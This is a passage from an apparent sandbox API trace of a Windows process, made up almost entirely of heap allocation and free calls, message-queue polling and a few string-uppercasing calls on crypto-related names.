(HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0243.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0243.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0243.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0243.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0243.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0243.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0243.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0243.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0243.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0243.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0243.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0243.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0243.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0243.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0243.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0243.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0243.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0243.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0243.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0243.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0243.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0243.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0243.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0243.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0243.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0243.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0243.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0243.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0243.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0243.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0243.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0243.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0243.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0243.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0243.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0243.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0243.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0243.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0243.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0243.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0243.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0243.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0243.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0243.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0243.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0243.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0243.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0243.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0243.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0243.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0243.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0243.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0243.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0243.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0243.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0243.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978528 | out: hHeap=0x970000) returned 1 [0243.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0243.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0243.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0243.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0243.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0243.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0243.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0243.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0243.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0243.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0243.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0243.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0243.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3bf7750 [0243.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9785b0 | out: hHeap=0x970000) returned 1 [0243.510] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0243.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0243.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0243.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0243.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0243.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0243.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0243.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0243.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0243.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0243.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0243.510] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0243.511] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0243.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0243.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0243.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0243.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0243.511] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0243.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0243.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0243.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0243.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0243.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0243.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0243.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0243.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0243.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0243.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0243.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0243.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0243.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1db8) returned 0x2f14818 [0243.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0243.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0243.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0243.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0243.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0243.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0243.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0243.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0243.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0243.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0243.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0243.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0243.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1db8) returned 0x2f165d8 [0243.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0243.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0243.512] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0243.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0243.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0243.512] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0243.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0243.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0243.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0243.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0243.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0243.513] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0243.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0243.513] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0243.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0243.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0243.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51250 [0243.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0243.513] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0243.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0243.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0243.513] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0243.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0243.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0243.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0243.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0243.513] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0243.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0243.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0243.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0243.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0243.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0243.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0243.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0243.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0243.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0243.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511c0 [0243.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0243.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51268 [0243.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51010 [0243.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510d0 [0243.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0243.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0243.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0243.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51148 [0243.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51280 [0243.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0243.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0243.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0243.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0243.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0243.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0243.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0243.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0243.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0243.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0243.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0243.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0243.516] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0243.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0243.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0243.516] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0243.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0243.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0243.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0243.516] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0243.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0243.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0243.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0243.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0243.516] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0243.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0243.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0243.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0243.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0243.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0243.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0243.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0243.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0243.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0243.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0243.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0243.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0243.517] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0243.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0243.517] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0243.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0243.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0243.517] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0243.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0243.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0243.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0243.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0243.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0243.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0243.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0243.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0243.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0243.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0243.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1db8) returned 0x2f14818 [0243.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0243.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0243.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1db8) returned 0x2f18398 [0243.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0243.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0243.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0243.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0243.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0243.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0243.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 